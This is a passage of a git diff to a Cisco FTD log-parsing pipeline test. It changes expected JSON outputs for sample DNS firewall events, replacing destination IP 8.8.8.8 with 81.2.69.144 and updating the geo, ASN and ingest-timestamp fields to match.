DNS_TTL: 21599 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json index babcde741ed..67caf248680 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json @@ -13,24 +13,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 145, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -78,7 +81,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -87,8 +90,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351787667Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70", + "ingested": "2021-12-09T13:32:56.096896200Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -118,7 +121,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -159,24 +162,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 193, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -224,7 +230,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -233,8 +239,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351793065Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299", + "ingested": "2021-12-09T13:32:56.096900400Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -265,7 +271,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -307,24 +313,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -372,7 +381,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -381,8 +390,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351795230Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", + "ingested": "2021-12-09T13:32:56.096904600Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -412,7 +421,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -453,24 +462,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 200, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -518,7 +530,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -527,8 +539,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351797116Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12", + "ingested": "2021-12-09T13:32:56.096910500Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -559,7 +571,7 @@ "dns_query": "www.elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -601,24 +613,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 193, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -666,7 +681,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -675,8 +690,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351798952Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error", + "ingested": "2021-12-09T13:32:56.096921600Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -706,7 +721,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -748,24 +763,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -813,7 +831,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -822,8 +840,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351800777Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658", + "ingested": "2021-12-09T13:32:56.096928100Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -853,7 +871,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -894,24 +912,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 199, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -959,7 +980,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -968,8 +989,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351802641Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", + "ingested": "2021-12-09T13:32:56.096934500Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1000,7 +1021,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -1043,24 +1064,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 221, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1108,7 +1132,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -1117,8 +1141,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351804509Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", + "ingested": "2021-12-09T13:32:56.096940100Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1148,7 +1172,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -1189,24 +1213,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1254,7 +1281,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -1263,8 +1290,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351806300Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", + "ingested": "2021-12-09T13:32:56.096946300Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1294,7 +1321,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -1336,24 +1363,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 722, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1401,7 +1431,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -1410,8 +1440,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351808085Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", + "ingested": "2021-12-09T13:32:56.096952400Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1442,7 +1472,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -1484,27 +1514,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -122.3303, - "lat": 47.6109 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 16509, + "number": 20712, 